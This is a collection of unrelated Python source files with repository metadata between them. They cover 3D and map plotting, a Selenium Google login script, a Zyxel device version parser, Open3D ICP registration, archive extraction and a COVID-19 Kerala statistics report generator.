data = self._user_to_array(data)
mlab.savefig(f_name)
return None
# Vizualisations
def extract_profile(self):
'''
To be implemented from Staal et al 2019: extract profiles.
'''
pass
return 0
def oblique_view(self, data,
save_name=None,
show=False,
azimuth=0,
elevation=45,
distance=1100,
roll=90,
figsize=(1800, 1800),
bgcolor=(1., 1., 1.),
warp_scale=0.015,
lut=None,
vmin=None,
vmax=None,
cmap='terrain'):
'''3D oblique view
Keyword arguments:
azimut -- Camera direction
elevation -- Camera height
distance -- Camera distance
roll -- Camera rotation
bgcolor -- Tuple of lenght 3, values from 0 to 1 RGB
warp_scale -- Enhance z, lower value increase the distortion
vmin and vmax -- Set color range
lut
cmap
Function exemplifies the use of mayavi and VTK for visualizing multidimensional data
'''
# Import mlab
from mayavi import mlab
# mlab.clf()
data = self._user_to_array(data)
if vmin is None:
vmin = np.nanpercentile(data, 0.1)
if vmax is None:
vmax = np.nanpercentile(data, 99.9)
if show:
mlab.options.offscreen = False
else:
mlab.options.offscreen = True
if cmap is None:
set_lut = True
cmap = 'viridis'
else:
set_lut = False
fig = mlab.figure(size=figsize, bgcolor=bgcolor)
surf = mlab.surf(data, warp_scale=warp_scale,
colormap=cmap, vmin=vmin, vmax=vmax, figure=fig)
mlab.view(azimuth=azimuth, elevation=elevation,
distance=distance, roll=roll)
if set_lut:
surf.module_manager.scalar_lut_manager.lut.table = lut
mlab.draw()
if save_name is not None:
save_array = mlab.screenshot(
figure=fig, mode='rgba', antialiased=True) * 255
imageio.imwrite(save_name, save_array.astype(np.uint8))
if show:
mlab.show()
mlab.close(all=True)
# Return obj
return None
def volume_slice(self, data,
save_name=None,
cmap='viridis',
vmin=None,
vmax=None,
show=False,
bgcolor=(1., 1., 1.)):
'''Open Mayavi scene
New function
'''
# Import mlab
from mayavi import mlab
# try:
# engine = mayavi.engine
# except NameError:
# from mayavi.api import Engine
# engine = Engine()
# engine.start()
if vmin is None:
vmin = np.nanpercentile(data, 0.1)
if vmax is None:
vmax = np.nanpercentile(data, 99.9)
# if len(engine.scenes) == 0:
# engine.new_scene()
mlab.figure(size=(1000, 1000), bgcolor=bgcolor)
mlab.clf()
mlab.volume_slice(data.values, plane_orientation='x_axes')
mlab.view(azimuth=azimuth, elevation=elevation,
distance=distance, roll=roll)
# module_manager = engine.scenes[0].children[0].children[0]
# module_manager.scalar_lut_manager.lut_mode = cmap
# scene = engine.scenes[0]
# scene.scene.x_minus_view()
if save_name is not None:
mlab.savefig(save_name, size=(1000, 1000))
if show_slice:
mlab.show()
return None
def map_grid(self,
im_datas,
ax = None,
vectors=[],
v_col=[],
v_alpha=1,
v_lw=1,
v_x_offset=0,
v_y_offset=0,
vmin=None,
vmax=None,
d_alpha=1,
dpi=300,
cmap='gray',
cbar=False,
save_cbar=None,
cbar_x_label='',
cbar_y_label='',
n_bins = 51,
cbar_dist = False,
cbar_dist_color = 'k',
cbar_dist_alpha = 0.6,
dist_height_ratio = 5,
cbar_dist_norm_peak = False,
corientation=None,
cfigsize=None,
cbar_label='',
cbar_labelsize = 16,
coastline_res='50m',
extent=None,
raster_extent = None,
fig = None,
line_c='gray',
g_c='gray',
g_w=0.5,
transparent_background=True,
g_a=0.5,
line_w=0.9,
circ_map=False,
figsize=None,
grid_steps=90,
mask_land=False,
mask_ocean=False,
map_crs=None,
norm = None,
ocean_color='white',
return_fig_ax = False,
land_color='green',
no_land_fill=np.nan,
title=None,
save_name=None,
show=True,
map_res='i',
draw_coast=True,
draw_grid=True,
draw_stock=False,
par=None,
mer=None,
draw_labels=False,
**kwargs):
'''Make map view for print or display.
Keyword arguments:a
ax, fig -- If provided, ax and fig objected defined
vmin, vmax - - Set range oc colormap. If not set 0.1 percentille is used
cmap - - Select colormap
cbar - - Boolean colorbar or not
extent - - Select a different extent than the object(left, right, down, up)
line_c - - Color of lines
line_grid_c - - Color of gridlines
line_w - - Whidth of lines
circ_map - - If selected, map is cropped to a circle around the center as
a hub. Sometimes visually appealing
figsize - - Size of figure in cm Default is 12cm high
land_only - - Crop oceans(In furure versions)
ocean_color - - Colour of oceans
no_land_fill - - Value for no land
title - - String for title
save_name - - Name of file to save to. E.g. png, pdf, or jpg
show_map - - Off if only saving, good for scripting
coastline_res = '110m', '50m' or '10m' for higher resolution
draw_coast - - If True, Basemab coastline is drawn.
draw_grid - - Draw parallells and meridieans
par - - List of Parallels
mer - - List of Meridians
This function will in a near future be amended to use cartopy or GMT.
'''
def create_circular_mask(h, w, center=None, radius=None):
center = [int(w / 2), int(h / 2)]
Y, X = np.ogrid[:h, :w]
dist_from_center = np.sqrt((X - center[0])**2 + (Y - center[1])**2)
mask = dist_from_center <= radius
return mask
if figsize is None:
figsize = (10, 10 * self.nx / self.ny)
if par is None:
par = np.arange(-90, 91, 10)
if mer is None:
mer = np.arange(-180, 181, 45)
if map_crs is None:
map_crs = self._epsg_to_cartopy(self.crs)
if extent is None:
extent = self.extent
if raster_extent is None:
raster_extent = self.extent
if fig is None:
#plt.clf()
fig = plt.figure(figsize=figsize)
if ax is None:
ax = plt.axes(projection=map_crs)
ax.set_extent(extent, map_crs)
# If only one raster, make list with one element
if not isinstance(im_datas, list):
im_datas = [im_datas]
if not isinstance(d_alpha, list):
d_alpha = [d_alpha]
# Loop to print all rasters
for i, im_data in enumerate(im_datas):
im_data = self._user_to_array(im_data)
if im_data is None:
im_data = np.zeros(self.nn)
im_data[:] = np.nan
vmin = 0
vmax = 0
# vmin, vmax = self._set_v_range(vmin, vmax, im_data)
if vmin is None:
vmin = np.nanpercentile(im_data, 0.1)
if vmax is None:
vmax = np.nanpercentile(im_data, 99.9)
if circ_map:
h, w = im_data.shape[:2]
mask = create_circular_mask(h, w, radius=h / 2)
im_data[~mask] = np.nan
im = ax.imshow(im_data,
alpha=d_alpha[i],
extent=raster_extent,
norm=norm,
vmin=vmin,
vmax=vmax,
transform=map_crs,
cmap=cmap,
zorder=5)
if cbar:
cbar = fig.colorbar(im, orientation='vertical',
fraction=0.046, pad=0.01)
cbar.set_label(cbar_label)
if mask_land:
ax.add_feature(cart.feature.LAND, zorder=100, edgecolor=land_color)
if mask_ocean:
ax.add_feature(cart.feature.OCEAN, zorder=100,
edgecolor=ocean_color)
if draw_stock:
ax.stock_img()
if draw_coast:
ax.coastlines(resolution=coastline_res, color=line_c, zorder=15)
if draw_grid:
gl = ax.gridlines(ylocs=par, xlocs=mer, alpha=g_a, linewidth=g_w,
color=g_c, draw_labels=draw_labels, zorder=25)
gl.n_steps = grid_steps
if isinstance(vectors, str):
vectors = [vectors]
if isinstance(v_col, str):
v_col = [v_col]
for j, vector in enumerate(vectors):
with fiona.open(str(vector), 'r') as src:
for i, geom in enumerate(src):
x = [i[0] for i in geom['geometry']['coordinates']]
y = [i[1] for i in geom['geometry']['coordinates']]
# x, y = proj.transform(proj.Proj(
# init='epsg:%s'%env['shape_proj']),
# proj.Proj(init='epsg:%s,
# x, y)
#x = [v_x_offset + _ for _ in x]
#y = [v_y_offset + _ for _ in y]
ax.plot(x, y, c=v_col[j],
alpha=v_alpha, lw=v_lw, zorder=20)
if title is not None:
fig.suptitle(title)
fig.canvas.draw() # https://github.com/SciTools/cartopy/issues/1207
fig.tight_layout(pad=0)
if transparent_background:
ax.outline_patch.set_visible(False)
ax.background_patch.set_visible(False)
if save_name is not None:
plt.savefig(save_name, transparent=True,
bbox_inches='tight', pad_inches=0, dpi=dpi)
print('Saved to:', save_name)
if save_cbar is not None:
if cfigsize is None:
cfigsize = figsize
if corientation is None:
corientation = 'horizontal'
if cbar_dist:
cig, (dax, cax) = plt.subplots(2,1,figsize=cfigsize,
sharex=True,
gridspec_kw={'height_ratios': [1, dist_height_ratio]})
dax.axis('off')
dax.hist(im_data.flatten(),
bins=n_bins,
density=True,
color=cbar_dist_color,
alpha=cbar_dist_alpha)
dax.set(xlim = (vmin, vmax))
plt.subplots_adjust(hspace = 0.02, wspace=0)
else:
cig, cax = plt.subplots(figsize=cfigsize)
cbar = plt.colorbar(im, ax=cax,
pad=0, fraction=1,
orientation=corientation,
aspect=10)
cax.axis('off')
cax.set_xlim(vmin, vmax)
cbar.ax.tick_params(labelsize=cbar_labelsize)
cbar.ax.set_xlabel(
cbar_x_label,
rotation=0,
size=12)
cbar.ax.set_ylabel(
cbar_y_label,
rotation=0,
size=12)
cig.savefig(save_cbar, transparent=True,
bbox_inches='tight', pad_inches=0, dpi=dpi)
if return_fig_ax:
return fig, ax
else:
if show:
plt.show()
return None
def look(self, rasters, save_name='look.png',
interp_method=None,
color_map='viridis',
show=True,
save=False,
max_n_plots=16,
x_unit='(km)',
y_unit='(km)',
ref_range=None,
**kwargs):
'''
Quick look of 2D slices.
Keyword arguments:
interp_method -- imshow interpolation methods
Rather undeveloped function.
'''
if len(rasters) > max_n_plots:
print('To much to see!')
return 0
else:
n_sq = int(np.ceil(np.sqrt(len(rasters))))
fig, ax = plt.subplots(n_sq, n_sq, figsize=(10, 10))
for k, raster in enumerate(rasters):
x_coords = raster.coords[sorted(raster.dims)[0]]
y_coords = raster.coords[sorted(raster.dims)[1]]
if ref_range is None:
plot_range = (np.nanmin(raster.values),
np.nanmax(raster.values))
else:
plot_range = ref_range
ax[k // n_sq, k % n_sq].imshow(raster.values,
interpolation=interp_method,
cmap=color_map,
extent=self.x1y1x2y2,
vmin=plot_range[
0], vmax=plot_range[1],
**kwargs)
ax[k // n_sq, k % n_sq].title.set_text('%s' % (raster.name,))
ax[k // n_sq, k % n_sq].set_aspect('auto')
ax[k // n_sq, k % n_sq].set_ylabel(y_coords.name + x_unit)
ax[k // n_sq, k % n_sq].set_xlabel(x_coords.name + y_unit)
fig.tight_layout(pad=0)
if save:
fig.savefig(save_name, transparent=True,
bbox_inches='tight', pad_inches=0)
if show:
plt.show()
return ax
def slider(self, data,
cmap='viridis',
figsize=(10, 10),
slider_dim=None,
slide_start=0,
slide_stop=None,
vmin=None,
vmax=None,
idx0=0,
sub_sample=1,
slider_label='Depth'):
'''Interactive display 3D grid with slider.
Using matplotlin widget.
For Jupyter, run: %matplotlib notebook
'''
data = self._user_to_array(data)
if slider_dim is None:
slider_dim = data.ndim - 1
assert data.ndim is 3, 'Slider only works for 3D data. '
fig, ax = plt.subplots(figsize=figsize)
plt.subplots_adjust(left=0.25, bottom=0.25)
d_data = np.take(
data, idx0, axis=slider_dim)[::sub_sample, ::sub_sample]
l = plt.imshow(d_data, cmap=cmap, origin='lower')
ax.margins(x=0)
if slide_stop is None:
slide_stop = data.shape[slider_dim]
axidx = plt.axes([0.25, 0.15, 0.65, 0.03], facecolor='orange')
slidx = Slider(
axidx,
slider_label,
slide_start,
slide_stop,
valinit=idx0,
valfmt='%d')
def update(val):
idx = slidx.val
d_data = np.take(
data, idx, axis=slider_dim)[::sub_sample, ::sub_sample]
l.set_data(d_data)
if vmin is None:
d_vmin = np.nanpercentile(d_data, 0.1)
else:
d_vmin = vmin
if vmax is None:
d_vmax = np.nanpercentile(d_data, 99.9)
else:
d_vmax = vmax
l.set_clim([d_vmin, d_vmax])
fig.canvas.draw_idle()
slidx.on_changed(update)
plt.show()
return None
def layer_cake(self,
data,
figsize=None,
save_name=None,
show_map=True,
make_wireframe=True,
d_alpha=0.6,
d_levels=100,
g_alpha=0.3,
g_lw=0.4,
scale_x=1,
scale_y=1,
scale_z=1,
vmin=None,
vmax=None,
cmap='viridis',
cbar=True,
layers=None,
dims=['X', 'Y', 'Z'],
global_vm=True,
reduce_dims=[5, 5, 5],
g_xy_sub_sample=5,
ax_grid=False,
x_factor=1,
y_factor=1,
z_factor=1,
azim=250,
elev=10,
dist=10,
x_lim=None,
y_lim=None,
z_lim=None,
outer_frame=False,
xlabel='$X$',
ylabel='$Y$',
zlabel='$Z$'):
'''Method to display 3D data by using only matplotlib
data : data to display
save_name : Name to save file to
make_wireframe : Display wireframe
data : data to plot, 2D or 3D
figsize ; figuee outout size in cm
save:name : filename as string to save file, don't save if None
wireframe_cel_size is a multiple of resolution in x and y.
'''
data = self._user_to_array(data)
if figsize is None:
figsize = (12, 12)
print('3D')
fig = plt.figure(figsize=figsize)
ax = fig.gca(projection='3d')
xve, yve = np.meshgrid(
self.ds.coords['X_edge'], self.ds.coords['Y_edge'])
xv = self.ds.coords['XV'].values
yv = self.ds.coords['YV'].values
if x_lim is None:
x_lim = (
self.ds['X'].min(),
self.ds['X'].max())
if y_lim is None:
y_lim = (
self.ds['Y'].min(),
self.ds['Y'].max())
if z_lim is None:
z_lim = (
self.ds['Z'].max(),
self.ds['Z'].min())
if layers is None:
layers = self.ds.coords['Z'].values
if global_vm:
if vmin is None:
vmin = np.nanpercentile(data, 0.1)
if vmax is None:
vmax = np.nanpercentile(data, 99.9)
assert data.ndim in [
2, 3], 'Can not display data in %s dimensions.' % data.ndim
for i, z in enumerate(layers):
if np.min(z_lim) <= z <= np.max(z_lim):
if data.ndim == 2:
layer_data = np.copy(data)
else:
layer_data = np.copy(data[:, :, i])
if make_wireframe:
xv_g = xv[::g_xy_sub_sample, ::g_xy_sub_sample]
yv_g = yv[::g_xy_sub_sample, ::g_xy_sub_sample]
z_g = z * \
np.ones(
self.nn)[
::g_xy_sub_sample,
::g_xy_sub_sample]
ax.plot_wireframe(
xv_g,
yv_g,
z_g,
color='k',
alpha=g_alpha,
lw=g_lw)
if not global_vm:
vmin = np.nanpercentile(layer_data, 0.1)
vmax = np.nanpercentile(layer_data, 99.9)
levels = np.linspace(vmin, vmax, d_levels)
cube = ax.contourf(xv, yv,
layer_data,
levels,
vmin=vmin,
vmax=vmax,
offset=z,
alpha=d_alpha,
cmap=cmap)
if cbar:
v = np.linspace(vmin, vmax, 10, endpoint=True)
assert global_vm, 'No global color map.'
cbar = fig.colorbar(cube,
ticks=v,
pad=0.0,
shrink=0.3,
aspect=10)
ax.set_xlabel(xlabel, fontsize=12)
ax.set_ylabel(ylabel, fontsize=12)
ax.set_zlabel(zlabel, fontsize=12)
ax.yaxis._axinfo['label']['space_factor'] = 3.0
plt.rcParams['axes3d.grid'] = ax_grid
ax.set_xlim(x_lim)
ax.set_ylim(y_lim)
ax.set_zlim(z_lim)
ax.azim = azim
ax.elev = elev
ax.dist = dist
ticks_x = ticker.FuncFormatter(
lambda x, pos: '{0:g}'.format(x // x_factor))
ax.xaxis.set_major_formatter(ticks_x)
ticks_y = ticker.FuncFormatter(
lambda y, pos: '{0:g}'.format(y // y_factor))
ax.yaxis.set_major_formatter(ticks_y)
ticks_z = ticker.FuncFormatter(
lambda z, pos: '{0:g}'.format(z // z_factor))
ax.zaxis.set_major_formatter(ticks_z)
fig.tight_layout(pad=0)
if save_name is not None:
fig.savefig(save_name, transparent=True,
bbox_inches='tight', pad_inches=0)
if show_map:
plt.show()
return None
def slice_3D():
return None
| 1.523438 | 2 |
src/server/scraper/scripts/login_google.py | wotsyula/flask-scrapper | 0 | 12764996 | #!/usr/bin/env python3
"""
Script that logs into `google.com`
"""
from logging import debug
from typing import Generator
from selenium.common.exceptions import NoSuchElementException, TimeoutException
from selenium.webdriver.common.keys import Keys
from ..script import Script as BaseClass
URL = 'https://www.google.com'
BAD_REQUEST = 400
UNAUTHORIZED = 401
SUCCESS = 200
class Script (BaseClass):
"""
Script that is imported by `Scraper` object.
See `Scraper.scrape()` function.
"""
def goto_login_page(self):
"""
Navigates to login page.
"""
if self.exists('//*[contains(@href, "google.com/Logout")]'):
debug('User already logged in')
return False
debug('going to login page')
# click login button
self.click('//a[contains(@href, "google.com/ServiceLogin")]')
# check for input field
if not self.exists('//input[@type="email"]'):
# click on use another account button
self.click('(//*[@tabindex="0"])[last()-2]')
return True
def execute(self, **kwargs) -> Generator[dict, None, None]:
"""
Attempts to log into website.
Args:
**max_page (int): last page to scrape. Default to 99
**page (int): Starting page to start execution. Default to 1
**retries (int): number of times to retry execution. Default to 2
**user_name (str, optional): email address of google user. Defaults to SERVER_EMAIL.
**user_pass (str, optional): password of google user. Defaults to SERVER_SECRET.
**kwargs (dict[str, any]): Used to pass arguments to script
Raises:
TimeoutException: if required elements are not found on page
Yields:
Generator[dict, None, None]: [description]
"""
options = {**self.options, **kwargs}
self.max_page = options.pop('max_page', 99)
# page = options.pop('page', 1)
retries = options.pop('retries', 2)
user_name = options.pop('user_name', '')
user_pass = options.pop('user_pass', '')
retries = options.pop('retries', 2)
# exit early if no user name / pass
if len(user_name) < 2 or len(user_pass) < 2:
yield BAD_REQUEST
return
try:
self.driver.get(URL)
if self.goto_login_page():
debug('Entering email address')
self.send_keys('//input[@type="email"]', user_name + Keys.ENTER, True)
self.sleep(5)
debug('Entering password')
self.send_keys('//input[@type="password"]', user_pass + Keys.ENTER, True)
self.sleep(10)
yield SUCCESS
except NoSuchElementException:
# failure
yield UNAUTHORIZED
except TimeoutException as err:
# no more attempts?
if retries < 1:
raise err
# Try again
self.execute(**kwargs, retries=retries - 1)
| 3.0625 | 3 |
components/server/src/data_model/meta/scale.py | kargaranamir/quality-time | 33 | 12764997 | <gh_stars>10-100
"""Data model scales."""
from pydantic import BaseModel # pylint: disable=no-name-in-module
from .base import DescribedModel
class Scale(DescribedModel): # pylint: disable=too-few-public-methods
"""Base model for scales."""
class Scales(BaseModel): # pylint: disable=too-few-public-methods
"""Scales mapping."""
__root__: dict[str, Scale]
| 1.851563 | 2 |
python-django/oauth2demo/oauth/core/token.py | SequencingDOTcom/oAuth2-demo | 1 | 12764998 | <reponame>SequencingDOTcom/oAuth2-demo
class Token(object):
def __init__(self, access_token, refresh_token, lifetime):
self.access_token = access_token # Access token value
self.refresh_token = refresh_token # Token needed for refreshing access token
self.lifetime = lifetime # Access token lifetime
| 2.40625 | 2 |
app/services/authentication/authenticator/request_analyzer.py | maxzhenzhera/my_vocab_backend | 0 | 12764999 | from dataclasses import dataclass
from typing import cast
from fastapi import Request
__all__ = ['RequestAnalyzer']
@dataclass
class RequestAnalyzer:
request: Request
@property
def client_ip_address(self) -> str:
return cast(str, self.request.client.host)
@property
def client_user_agent(self) -> str:
return self.request.headers['user-agent']
| 2.8125 | 3 |
sa/profiles/Zyxel/MSAN/get_version.py | ewwwcha/noc | 1 | 12765000 | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# Zyxel.MSAN.get_version
# ---------------------------------------------------------------------
# Copyright (C) 2007-2018 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
"""
"""
# Python modules
import re
# NOC modules
from noc.core.script.base import BaseScript
from noc.sa.interfaces.igetversion import IGetVersion
class Script(BaseScript):
name = "Zyxel.MSAN.get_version"
interface = IGetVersion
cache = True
rx_ver1 = re.compile(
r"^\s*product model\s*:\s+(?P<platform>\S+)\s*\n"
r"^\s*system up time\s*:\s+(?P<uptime>\S+)\s*\n"
r"^\s*f/w version\s*:\s+(?P<version>\S+) \| \S+\s*\n"
r"^\s*bootbase version\s*:\s+(?P<bootprom>\S+) \| \S+\s*\n",
re.MULTILINE,
)
rx_ver2 = re.compile(
r"^\s*Model: (?:\S+ \/ )?(?P<platform>\S+)\s*\n"
r"^\s*ZyNOS version: (?P<version>\S+) \| \S+\s*\n"
r".+?\n"
r"^\s*Bootbase version: (?P<bootprom>\S+) \| \S+\s*\n"
r".+?\n"
r"(^\s*Hardware version: (?P<hardware>\S+)\s*\n)?"
r"^\s*Serial number: (?P<serial>\S+)\s*\n",
re.MULTILINE | re.DOTALL,
)
rx_ver3 = re.compile(
r"^\s*ZyNOS version\s*: (?P<version>\S+) \| \S+\s*\n"
r".+?\n"
r".+?\n"
r"^\s*bootbase version\s*: (?P<bootprom>\S+)"
r"\((?P<platform>MSC\S+)\) \| \S+\s*\n",
re.MULTILINE,
)
rx_ver4 = re.compile(
r"^\s*Bootcode Version: (?P<bootprom>.+)\s*\n"
r"^\s*Hardware Version: (?P<hardware>.+)\s*\n"
r"^\s*Serial Number: (?P<serial>.+)\s*\n"
r"^\s*F/W Version: (?P<version>\S+)\s*\n",
re.MULTILINE,
)
rx_chips = re.compile(r"^\s*(?P<platform>\S+?)(/\S+)?\s+")
def execute(self):
slots = self.profile.get_slots_n(self)
try:
c = self.cli("sys version")
match = self.rx_ver1.search(c)
except self.CLISyntaxError:
c = self.cli("sys info show", cached=True)
match = self.rx_ver2.search(c)
if not match:
match = self.rx_ver3.search(c)
if match:
platform = self.profile.get_platform(self, slots, match.group("platform"))
else:
match = self.rx_ver4.search(self.cli("sys info show", cached=True))
if match:
match1 = self.rx_chips.search(self.cli("chips info"))
r = {
"vendor": "ZyXEL",
"platform": match1.group("platform"),
"version": match.group("version"),
}
if match.group("bootprom") != "not defined":
if "attributes" not in r:
r["attributes"] = {}
r["attributes"]["Boot PROM"] = match.group("bootprom")
if match.group("hardware") != "not defined":
if "attributes" not in r:
r["attributes"] = {}
r["attributes"]["HW version"] = match.group("hardware")
if match.group("serial") != "not defined":
if "attributes" not in r:
r["attributes"] = {}
r["attributes"]["Serial Number"] = match.group("serial")
return r
else:
raise self.NotSupportedError()
r = {
"vendor": "ZyXEL",
"platform": platform,
"version": match.group("version"),
"attributes": {"Boot PROM": match.group("bootprom")},
}
if ("hardware" in match.groupdict()) and (match.group("hardware")):
r["attributes"]["HW version"] = match.group("hardware")
if ("serial" in match.groupdict()) and (match.group("serial")):
r["attributes"]["Serial Number"] = match.group("serial")
return r
| 1.796875 | 2 |
_unittests/ut_install/test_LONG_install_module.py | sdpython/pymyinstall | 8 | 12765001 | <gh_stars>1-10
"""
@brief test log(time=1s)
"""
import unittest
from pyquickhelper.loghelper import fLOG
from pymyinstall.installhelper.module_install import ModuleInstall
from pymyinstall.installhelper.module_install_version import get_module_version
class TestLONGInstallModule (unittest.TestCase):
def test_pypi_version(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
mod = ModuleInstall("sphinx", "pip")
vers = mod.get_pypi_version()
assert vers >= "1.3.1"
mod = ModuleInstall("scikit-learn", "wheel", mname="sklearn")
fLOG(mod)
vers = mod.get_pypi_version()
assert vers >= "0.16.1"
update = mod.has_update()
fLOG("scikit-learn", update)
mod = ModuleInstall("pandas", "wheel")
vers = mod.get_pypi_version()
if vers is None or vers < "0.16.1":
raise Exception("{0}: {1}".format(mod.name, vers))
mod = ModuleInstall("openpyxl", "pip", version="2.3.5")
fLOG(mod)
vers = mod.get_pypi_version()
if vers is None or vers < "2.3.5":
raise Exception("{0}: {1}".format(mod.name, vers))
update = mod.has_update()
if update:
vers = mod.get_pypi_numeric_version()
fLOG(vers)
fLOG(update)
def test_installed_version(self):
fLOG(
__file__,
self._testMethodName,
OutputPrint=__name__ == "__main__")
mod = ModuleInstall("jinja2", "pip")
res = mod.is_installed_version()
if not res:
fLOG(mod)
fLOG(mod.get_installed_version())
for k, v in get_module_version(None).items():
if k[0] in ("j", "J"):
fLOG("+++", k, v)
assert False
mod = ModuleInstall("pandas", "wheel")
res = mod.is_installed_version()
assert res
fLOG("****", mod.get_installed_version(), mod.get_pypi_version())
if mod.get_installed_version() != mod.get_pypi_version():
assert mod.has_update()
if __name__ == "__main__":
unittest.main()
| 2.15625 | 2 |
Open3d/code/Pipelines/icp_registration.py | yueliu1999/3d-vision | 7 | 12765002 | import open3d as o3d
import copy
import numpy as np
# Helper visualization function
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
o3d.visualization.draw_geometries([source_temp, target_temp])
# input
source = o3d.io.read_point_cloud("../test_data/icp/cloud_bin_0.pcd")
target = o3d.io.read_point_cloud("../test_data/icp/cloud_bin_1.pcd")
trans_init = np.asarray([[0.862, 0.011, -0.507, 0.5],
[-0.139, 0.967, -0.215, 0.7],
[0.487, 0.255, 0.835, -1.4], [0.0, 0.0, 0.0, 1.0]])
draw_registration_result(source, target, trans_init)
# init
print("Initial alignment")
threshold = 0.02
evaluation = o3d.pipelines.registration.evaluate_registration(
source, target, threshold, trans_init)
print(evaluation)
# point-to-point ICP
print("Apply point-to-point ICP")
reg_p2p = o3d.pipelines.registration.registration_icp(
source, target, threshold, trans_init,
o3d.pipelines.registration.TransformationEstimationPointToPoint())
print(reg_p2p)
print("Transformation is:")
print(reg_p2p.transformation)
draw_registration_result(source, target, reg_p2p.transformation)
# point-to-point ICP, max_iteration
reg_p2p = o3d.pipelines.registration.registration_icp(
source, target, threshold, trans_init,
o3d.pipelines.registration.TransformationEstimationPointToPoint(),
o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration=2000))
print(reg_p2p)
print("Transformation is:")
print(reg_p2p.transformation)
draw_registration_result(source, target, reg_p2p.transformation)
# point-to plane ICP
print("Apply point-to-plane ICP")
reg_p2l = o3d.pipelines.registration.registration_icp(
source, target, threshold, trans_init,
o3d.pipelines.registration.TransformationEstimationPointToPlane())
print(reg_p2l)
print("Transformation is:")
print(reg_p2l.transformation)
draw_registration_result(source, target, reg_p2l.transformation) | 2.171875 | 2 |
uncompress/uncompress.py | Apiquet/utils | 0 | 12765003 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Uncompress program for tar, tar.gz, zip, etc
Args:
- Path to the compressed file to extract
- Path to the output folder for extracted files
Example:
python3 uncompress.py -i path/to/file.tar.gz -o path/for/extractedfiles
"""
import argparse
import shutil
def extract(compressedfile, extract_path):
'''Extract files
Args:
- compressedfile (str) : path to the compressed file
- extract_path (str) : path for the extracted files
'''
shutil.unpack_archive(compressedfile, extract_path)
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"-i",
"--compressedfile",
required=True,
type=str,
help="Path to the file to uncompress."
)
parser.add_argument(
"-o",
"--output",
required=True,
type=str,
help="Output path for the extracted files."
)
args = parser.parse_args()
extract(args.compressedfile, args.output)
if __name__ == '__main__':
main()
| 3.796875 | 4 |
report_generator.py | aravindskrishnan/COVID19-Report-Generator | 0 | 12765004 |
"""
Developer : <NAME>
VER : 1.0
Data Source : https://api.covid19india.org/v4/data.json
"""
import urllib.request
import urllib.error
import json
import matplotlib.pyplot as plt
import numpy as np
import time
from PIL import Image
from PIL import ImageFont
from PIL import ImageDraw
#Graph Plotting Function
def ploting(chart_type,chart_name,lim):
plt.subplots()
y_pos=np.arange(len(districts))
plt.barh(y_pos,chart_type, align='center', alpha=0.6,)
for i, v in enumerate(chart_type):
plt.text(v, i-.2, str(v), color='red')
plt.yticks(y_pos,districts)
plt.xlabel('Cases')
plt.xlim([0,lim])
name='Districtwise '+chart_name+' on '+date
plt.title(name)
plt.savefig(chart_name+'.png',bbox_inches='tight',pad_inches=0.2)
plt.show()
#District Data Extraction Function
def data_district(data_type):
name_type=data_type
confirmed_cases=(Alappuzha["total"][name_type],Ernakulam["total"][name_type],Idukki["total"][name_type],Kannur["total"][name_type],
Kasargod["total"][name_type],Kollam["total"][name_type],Kottayam["total"][name_type],
Kozhikode["total"][name_type],Malappuram["total"][name_type],Palakkad["total"][name_type],
Pathanamthitta["total"][name_type],Thiruvananthapuram["total"][name_type],
Thrissur["total"][name_type],Wayanad["total"][name_type])
return(confirmed_cases)
#Graph Image Pasting Function
def image_paste(image_name,x_cord,y_cord):
img_total = Image.open(image_name)
img_total = img_total.resize((round(img_total.size[0]*2.3), round(img_total.size[1]*2.3)))
graph_img = img.copy()
graph_img.paste(img_total, (x_cord, y_cord))
return graph_img
#Loading Constants and Data
date=time.strftime("%d-%m-%Y")
url = 'https://api.covid19india.org/v4/data.json'
output = urllib.request.urlopen(url).read()
tree = json.loads(output)
#Setting District Constants
Alappuzha=tree["KL"]["districts"]["Alappuzha"]
Ernakulam=tree["KL"]["districts"]["Ernakulam"]
Idukki=tree["KL"]["districts"]["Idukki"]
Kannur=tree["KL"]["districts"]["Kannur"]
Kasargod=tree["KL"]["districts"]["Kasaragod"]
Kollam=tree["KL"]["districts"]["Kollam"]
Kottayam=tree["KL"]["districts"]["Kottayam"]
Kozhikode=tree["KL"]["districts"]["Kozhikode"]
Malappuram=tree["KL"]["districts"]["Malappuram"]
Palakkad=tree["KL"]["districts"]["Palakkad"]
Pathanamthitta=tree["KL"]["districts"]["Pathanamthitta"]
Thiruvananthapuram=tree["KL"]["districts"]["Thiruvananthapuram"]
Thrissur=tree["KL"]["districts"]["Thrissur"]
Wayanad=tree["KL"]["districts"]["Wayanad"]
totalKerala=tree["KL"]["total"]
#Creating District Name Tuple
districts=('Allapuzha','Ernakulam','Idukki','Kannur','Kasargod','Kollam','Kottayam','Kozhikode','Malappuram',
'Palakkad','Pathnamthitta','Thiruvananthapuram','Thrissur','Wayanad')
#Plotting Bar Charts
cases=data_district('confirmed')#Confirmed Cases
ploting(cases,'total cases',13500)
recovered=data_district('recovered')#Recovered Cases
ploting(recovered,'recoveries',8000)
death=data_district('deceased')#Deaths
ploting(death, 'total deaths',80)
active_cases=res = tuple(map(lambda i, j,k: i - j - k, cases, recovered,death)) #Active Cases
ploting(active_cases,'active cases',6000)
#Report Text Generation
report_name='COVID-19 Kerala Statistics'
font='lt.otf' #Replace with prefered font name
img = Image.open("template.png")
img = img.convert('RGB')
draw = ImageDraw.Draw(img)
selectFont = ImageFont.truetype(font, size = 130)
draw.text( (200,100), report_name.upper(),(90,115,95), font=selectFont)
selectFont = ImageFont.truetype(font, size = 60)
draw.text( (920,260), 'DATE : '+date,(100,100,100), font=selectFont)
draw.text( (380,660), 'Total Cases : '+str(totalKerala['confirmed']),(200,0,0), font=selectFont)
draw.text( (1350,760), 'Total Recoveries : '+str(totalKerala['recovered']),(0,200,0), font=selectFont)
draw.text( (1350,660), 'Total Deaths : '+str(totalKerala['deceased']),(50,50,50), font=selectFont)
